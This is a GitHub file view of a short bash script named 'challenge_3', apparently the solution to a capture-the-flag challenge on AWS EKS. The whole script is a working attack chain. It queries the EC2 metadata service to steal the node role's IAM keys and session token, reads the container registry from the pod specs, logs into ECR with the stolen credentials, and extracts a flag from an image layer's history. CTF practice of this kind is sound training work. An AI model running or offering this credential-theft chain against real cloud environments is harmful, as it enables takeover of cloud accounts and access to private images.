-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathchallenge_3
18 lines (14 loc) · 976 Bytes
/
challenge_3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/bin/bash
# Grabbing the creds for the eks node role
export ROLE=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/)
export JSON=$(curl http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE)
export AWS_ACCESS_KEY_ID=$(echo $JSON | jq -r '.AccessKeyId' )
export AWS_SECRET_ACCESS_KEY=$(echo $JSON | jq -r '.SecretAccessKey' )
export AWS_SESSION_TOKEN=$(echo $JSON | jq -r '.SessionToken' )
# Hack to grab the registry dynamically
export REGISTRY=$(kubectl get pods -o json | jq -r '.items[0].spec.containers[0].image' | cut -d '/' -f 1)
export IMAGE=$(kubectl get pods -o json | jq -r '.items[0].spec.containers[0].image' | cut -d '/' -f 2)
# Getting a password from the session and logging into crane
aws ecr get-login-password | crane auth login $REGISTRY --username AWS --password-stdin
# Hack to get the flag from the image layer
crane config $REGISTRY/$IMAGE | jq -r '.history[2].created_by' | cut -d '=' -f 3 | cut -d ' ' -f 1